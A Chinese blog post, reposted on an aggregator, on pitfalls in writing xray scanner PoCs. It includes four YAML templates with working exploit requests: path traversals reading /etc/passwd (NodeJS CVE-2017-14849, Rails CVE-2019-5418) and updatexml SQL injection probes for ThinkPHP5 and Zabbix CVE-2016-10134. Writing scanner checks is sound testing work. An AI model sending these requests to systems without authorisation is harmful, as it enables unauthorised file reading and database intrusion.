当前位置: 首页 > news >正文

xray写POC踩坑

错误记录

  • 静态文件目录不一定是static。

  • 只考虑了linux的情况,如果是 windows 呢,能读取某些应用自己的源码吗。

  • 实际环境参数不一定是id,thinkphp 不适合使用 poc 来写

  • poc 内容没啥问题,文件名和 poc name有问题 https://travis-ci.org/chaitin/xray/builds/583451463?utm_source=github_status&utm_medium=notification

NodeJS_path-validation_CVE-2017-14849.yml


name: NodeJS_path-validation_CVE-2017-14849
rules:
  - method: GET
    path: /static/../../../a/../../../../etc/passwd
    headers:
      Accept: ''
    follow_redirects: false
    expression: |
      status==200 && body.bcontains(b'root:x:0:0')
detail:
  author: 17bdw
  Affected Version: "NodeJS 8.5.0"
  links:
    - https://github.com/vulhub/vulhub/tree/master/node/CVE-2017-14849

Rails_file_content_disclosure_CVE-2019-5418

name: Rails_file_content_disclosure_CVE-2019-5418
rules:
  - method: GET
    path: /robots
    headers:
      Accept: '../../../../../../../../etc/passwd{{'
    follow_redirects: false
    expression: |
      status==200 && body.bcontains(b'root:x:0:0')
detail:
  author: 17bdw
  Affected Version: "Rails_<6.0.0.beta3, 5.2.2.1, 5.1.6.2, 5.0.7.2, 4.2.11.1"
  links:
    - https://github.com/vulhub/vulhub/tree/master/rails/CVE-2019-5418

thinkphp5-in-sqlinjection

name: thinkphp5-in-sqlinjection
rules:
  - method: GET
    path: /index.php?ids[0,updatexml(0,concat(0xa,MD5(8888)),0)]=1
    expression: |
      body.bcontains(b'cf79ae6addba60ad018347359bd144d')
detail:
  author: 17bdw
  Affected Version: "thinkphp5-in-sqlinjection"
  vuln_url: "/index.php?ids[0,updatexml(0,concat(0xa,MD5(8888)),0)]=1"
  links:
    - https://github.com/vulhub/vulhub/tree/master/thinkphp/in-sqlinjection

zabbix_3.0.3_jsrpc.php_CVE-2016-10134

  
name: zabbix_3.0.3_jsrpc.php_CVE-2016-10134
rules:
  - method: GET
    path: /jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,MD5(8888)),0)
    expression: |
      body.bcontains(b'cf79ae6addba60ad018347359bd144d')
detail:
  author: 17bdw
  Affected Version: "zabbix_3.0.3_jsrpc.php_CVE-2016-10134"
  vuln_url: "/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)"
  links:
    - https://github.com/vulhub/vulhub/tree/master/zabbix/CVE-2016-10134

转载于:https://www.cnblogs.com/17bdw/p/11515741.html

相关文章:

  • 对 Watchbog Botnet 渗透过程和 Payload 的分析
  • c++ 初学者 慢慢成长中
  • max pool实现
  • Kafka Stream 以及其他流处理框架对比
  • cpp 面向对象初步探索
  • cpp 实现简易String类
  • Apache Kafka(十)Partitions与Replication Factor 调整准则
  • 蒜头君的购物袋1、蒜头君的购物袋2-(01背包)
  • vue页面传参
  • SSM框架-Spring
  • 端口扫描
  • js 条件方法、数组方法
  • 利用Python原始库完成一个端口扫描的功能
  • 服务器spring boot版本,平滑升级
  • 平滑启动shell脚本
  • Consul Config 使用Git做版本控制的实现
  • leetcode388. Longest Absolute File Path
  • Linux CTF 逆向入门
  • node 版本过低
  • OSS Web直传 (文件图片)
  • Spark in action on Kubernetes - Playground搭建与架构浅析
  • 分享几个不错的工具
  • 理解 C# 泛型接口中的协变与逆变(抗变)
  • 前嗅ForeSpider教程:创建模板
  • 使用Swoole加速Laravel(正式环境中)
  • AI又要和人类“对打”,Deepmind宣布《星战Ⅱ》即将开始 ...
  • ### Cause: com.mysql.jdbc.exceptions.jdbc4.MySQLTr
  • #多叉树深度遍历_结合深度学习的视频编码方法--帧内预测
  • #鸿蒙生态创新中心#揭幕仪式在深圳湾科技生态园举行
  • #我与Java虚拟机的故事#连载09:面试大厂逃不过的JVM
  • ()、[]、{}、(())、[[]]等各种括号的使用
  • (二十三)Flask之高频面试点
  • (附源码)ssm旅游企业财务管理系统 毕业设计 102100
  • (附源码)基于SpringBoot和Vue的厨到家服务平台的设计与实现 毕业设计 063133
  • (机器学习-深度学习快速入门)第三章机器学习-第二节:机器学习模型之线性回归
  • (南京观海微电子)——I3C协议介绍
  • (四)七种元启发算法(DBO、LO、SWO、COA、LSO、KOA、GRO)求解无人机路径规划MATLAB
  • (五)MySQL的备份及恢复
  • (学习日记)2024.01.09
  • (学习日记)2024.03.12:UCOSIII第十四节:时基列表
  • (已解决)什么是vue导航守卫
  • (转载)OpenStack Hacker养成指南
  • .Net CF下精确的计时器
  • .net php 通信,flash与asp/php/asp.net通信的方法
  • .net安装_还在用第三方安装.NET?Win10自带.NET3.5安装
  • .NET单元测试
  • .Net各种迷惑命名解释
  • .net通用权限框架B/S (三)--MODEL层(2)
  • /bin/bash^M: bad interpreter: No such file ordirectory
  • @EnableAsync和@Async开始异步任务支持
  • [100天算法】-二叉树剪枝(day 48)
  • [52PJ] Java面向对象笔记(转自52 1510988116)
  • [Angular 基础] - 数据绑定(databinding)
  • [AX]AX2012 SSRS报表Drill through action
  • [dart学习]第四篇:函数